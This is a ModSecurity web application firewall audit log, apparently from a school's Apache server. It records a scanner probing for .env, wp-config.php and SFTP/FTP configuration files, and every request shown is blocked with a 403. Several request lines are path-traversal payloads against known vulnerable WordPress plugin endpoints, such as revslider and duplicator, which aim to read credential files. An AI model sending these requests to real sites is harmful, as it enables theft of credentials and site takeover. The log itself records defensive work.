Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--4d842e29-Z--
--b8e07c5a-A--
[01/May/2025:10:25:34 +0700] aBLprigtr0Qsi1mFAsMIXAAAAJI 103.236.140.4 49282 103.236.140.4 8181
--b8e07c5a-B--
GET /laravel/.env HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 164.92.74.66
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 164.92.74.66
X-Forwarded-Proto: https
Connection: close
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.79 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Language: en-US,en;q=0.9
--b8e07c5a-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--b8e07c5a-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1746069934574349 814 (- - -)
Stopwatch2: 1746069934574349 814; combined=294, p1=264, p2=0, p3=0, p4=0, p5=30, sr=107, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--b8e07c5a-Z--
--a34c0b57-A--
[01/May/2025:10:25:34 +0700] aBLpruVeTgVPHjrSAYAMLwAAABA 103.236.140.4 49292 103.236.140.4 8181
--a34c0b57-B--
GET /ci4/.env HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 164.92.74.66
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 164.92.74.66
X-Forwarded-Proto: https
Connection: close
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.79 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Language: en-US,en;q=0.9
--a34c0b57-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--a34c0b57-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1746069934775034 784 (- - -)
Stopwatch2: 1746069934775034 784; combined=308, p1=264, p2=0, p3=0, p4=0, p5=44, sr=81, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--a34c0b57-Z--
--5f906e15-A--
[01/May/2025:10:25:34 +0700] aBLprsVMAgMJpNzaVtKqgAAAAEo 103.236.140.4 49310 103.236.140.4 8181
--5f906e15-B--
GET /backup/.env HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 164.92.74.66
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 164.92.74.66
X-Forwarded-Proto: https
Connection: close
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.79 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Language: en-US,en;q=0.9
--5f906e15-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--5f906e15-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1746069934975310 771 (- - -)
Stopwatch2: 1746069934975310 771; combined=290, p1=254, p2=0, p3=0, p4=0, p5=35, sr=73, sw=1, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--5f906e15-Z--
--617a8c6b-A--
[01/May/2025:10:25:35 +0700] aBLpr8VMAgMJpNzaVtKqgwAAAEM 103.236.140.4 49320 103.236.140.4 8181
--617a8c6b-B--
GET /frontend/.env HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 164.92.74.66
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 164.92.74.66
X-Forwarded-Proto: https
Connection: close
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.79 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Language: en-US,en;q=0.9
--617a8c6b-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--617a8c6b-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1746069935175856 713 (- - -)
Stopwatch2: 1746069935175856 713; combined=223, p1=196, p2=0, p3=0, p4=0, p5=27, sr=54, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--617a8c6b-Z--
--f5c68120-A--
[01/May/2025:10:25:35 +0700] aBLprygtr0Qsi1mFAsMIXQAAAJQ 103.236.140.4 49330 103.236.140.4 8181
--f5c68120-B--
GET /old/.env HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 164.92.74.66
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 164.92.74.66
X-Forwarded-Proto: https
Connection: close
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.79 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Language: en-US,en;q=0.9
--f5c68120-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--f5c68120-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1746069935375295 733 (- - -)
Stopwatch2: 1746069935375295 733; combined=250, p1=220, p2=0, p3=0, p4=0, p5=30, sr=60, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--f5c68120-Z--
--bf9bbd5b-A--
[01/May/2025:10:25:35 +0700] aBLpr4144kZ4LAGlEgzxiQAAAMc 103.236.140.4 49340 103.236.140.4 8181
--bf9bbd5b-B--
GET /dev/.env HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 164.92.74.66
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 164.92.74.66
X-Forwarded-Proto: https
Connection: close
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.79 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Language: en-US,en;q=0.9
--bf9bbd5b-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--bf9bbd5b-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1746069935574884 845 (- - -)
Stopwatch2: 1746069935574884 845; combined=280, p1=243, p2=0, p3=0, p4=0, p5=36, sr=67, sw=1, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--bf9bbd5b-Z--
--9c2c2a24-A--
[01/May/2025:10:25:35 +0700] aBLprygtr0Qsi1mFAsMIYAAAAJY 103.236.140.4 49350 103.236.140.4 8181
--9c2c2a24-B--
GET /.env HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 164.92.74.66
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 164.92.74.66
X-Forwarded-Proto: https
Connection: close
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.79 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Language: en-US,en;q=0.9
--9c2c2a24-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--9c2c2a24-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1746069935775227 798 (- - -)
Stopwatch2: 1746069935775227 798; combined=255, p1=224, p2=0, p3=0, p4=0, p5=31, sr=62, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--9c2c2a24-Z--
--8fbb1009-A--
[01/May/2025:10:25:35 +0700] aBLpr4144kZ4LAGlEgzxiwAAAME 103.236.140.4 49364 103.236.140.4 8181
--8fbb1009-B--
GET /public/.env HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 164.92.74.66
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 164.92.74.66
X-Forwarded-Proto: https
Connection: close
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.79 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Language: en-US,en;q=0.9
--8fbb1009-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--8fbb1009-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1746069935975868 856 (- - -)
Stopwatch2: 1746069935975868 856; combined=306, p1=268, p2=0, p3=0, p4=0, p5=38, sr=74, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--8fbb1009-Z--
--dd6b1973-A--
[01/May/2025:10:25:55 +0700] aBLpw8VMAgMJpNzaVtKqzQAAAEo 103.236.140.4 50248 103.236.140.4 8181
--dd6b1973-B--
GET /wp-admin/admin-ajax.php?action=duplicator_download&file=../wp-config.php HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 164.92.74.66
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 164.92.74.66
X-Forwarded-Proto: https
Connection: close
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.79 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Language: en-US,en;q=0.9
--dd6b1973-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--dd6b1973-H--
Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1746069955269838 820 (- - -)
Stopwatch2: 1746069955269838 820; combined=267, p1=240, p2=0, p3=0, p4=0, p5=27, sr=64, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--dd6b1973-Z--
--ab120268-A--
[01/May/2025:10:25:55 +0700] aBLpw8VMAgMJpNzaVtKq0AAAAEI 103.236.140.4 50258 103.236.140.4 8181
--ab120268-B--
GET /wp-content/plugins/cherry-plugin/admin/import-export/download-content.php?file=../../../../../wp-config.php HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 164.92.74.66
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 164.92.74.66
X-Forwarded-Proto: https
Connection: close
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.79 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Language: en-US,en;q=0.9
--ab120268-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--ab120268-H--
Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1746069955471495 683 (- - -)
Stopwatch2: 1746069955471495 683; combined=259, p1=233, p2=0, p3=0, p4=0, p5=26, sr=63, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--ab120268-Z--
--a3386c49-A--
[01/May/2025:10:25:55 +0700] aBLpw-VeTgVPHjrSAYAMXgAAABU 103.236.140.4 50270 103.236.140.4 8181
--a3386c49-B--
GET /force-download.php?file=wp-config.php HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 164.92.74.66
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 164.92.74.66
X-Forwarded-Proto: https
Connection: close
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.79 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Language: en-US,en;q=0.9
--a3386c49-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--a3386c49-H--
Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1746069955671971 722 (- - -)
Stopwatch2: 1746069955671971 722; combined=279, p1=235, p2=0, p3=0, p4=0, p5=44, sr=58, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--a3386c49-Z--
--9c07097a-A--
[01/May/2025:10:25:55 +0700] aBLpw8VMAgMJpNzaVtKq1AAAAE0 103.236.140.4 50280 103.236.140.4 8181
--9c07097a-B--
GET /wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl=../../../wp-config.php HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 164.92.74.66
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 164.92.74.66
X-Forwarded-Proto: https
Connection: close
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.79 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Language: en-US,en;q=0.9
--9c07097a-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--9c07097a-H--
Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1746069955871897 805 (- - -)
Stopwatch2: 1746069955871897 805; combined=293, p1=258, p2=0, p3=0, p4=0, p5=34, sr=66, sw=1, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--9c07097a-Z--
--d578dd06-A--
[01/May/2025:10:25:56 +0700] aBLpxOVeTgVPHjrSAYAMYAAAABg 103.236.140.4 50294 103.236.140.4 8181
--d578dd06-B--
GET /wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 164.92.74.66
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 164.92.74.66
X-Forwarded-Proto: https
Connection: close
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.79 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Language: en-US,en;q=0.9
--d578dd06-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--d578dd06-H--
Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1746069956072399 922 (- - -)
Stopwatch2: 1746069956072399 922; combined=346, p1=305, p2=0, p3=0, p4=0, p5=41, sr=77, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--d578dd06-Z--
--0ac11605-A--
[01/May/2025:10:26:02 +0700] aBLpyo144kZ4LAGlEgzx6wAAAMw 103.236.140.4 50602 103.236.140.4 8181
--0ac11605-B--
GET /.vscode/sftp-config.json HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 164.92.74.66
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 164.92.74.66
X-Forwarded-Proto: https
Connection: close
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.79 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Language: en-US,en;q=0.9
--0ac11605-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--0ac11605-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/sftp-config.json" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1746069962704228 804 (- - -)
Stopwatch2: 1746069962704228 804; combined=333, p1=299, p2=0, p3=0, p4=0, p5=34, sr=112, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--0ac11605-Z--
--bf6fc11a-A--
[01/May/2025:10:26:02 +0700] aBLpysVMAgMJpNzaVtKq6AAAAFY 103.236.140.4 50612 103.236.140.4 8181
--bf6fc11a-B--
GET /resources/sftp-config.json HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 164.92.74.66
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 164.92.74.66
X-Forwarded-Proto: https
Connection: close
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.79 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Language: en-US,en;q=0.9
--bf6fc11a-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--bf6fc11a-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/sftp-config.json" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1746069962905007 934 (- - -)
Stopwatch2: 1746069962905007 934; combined=369, p1=321, p2=0, p3=0, p4=0, p5=47, sr=81, sw=1, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--bf6fc11a-Z--
--8fcb7170-A--
[01/May/2025:10:26:03 +0700] aBLpy-VeTgVPHjrSAYAMbQAAAAg 103.236.140.4 50656 103.236.140.4 8181
--8fcb7170-B--
GET /ftp.config HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 164.92.74.66
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 164.92.74.66
X-Forwarded-Proto: https
Connection: close
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.79 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Language: en-US,en;q=0.9
--8fcb7170-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--8fcb7170-H--
Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||smkn22-jkt.sch.id|F|2"] [data ".config"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Stopwatch: 1746069963827752 2339 (- - -)
Stopwatch2: 1746069963827752 2339; combined=959, p1=411, p2=519, p3=0, p4=0, p5=29, sr=72, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--8fcb7170-Z--
--1d448337-A--
[01/May/2025:10:26:11 +0700] aBLp04144kZ4LAGlEgzx_gAAANg 103.236.140.4 50998 103.236.140.4 8181
--1d448337-B--
GET /ftp.config HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 164.92.74.66
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 164.92.74.66
X-Forwarded-Proto: https
Connection: close
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.79 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Language: en-US,en;q=0.9
--1d448337-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--1d448337-H--
Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||smkn22-jkt.sch.id|F|2"] [data ".config"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Stopwatch: 1746069971128600 1534 (- - -)
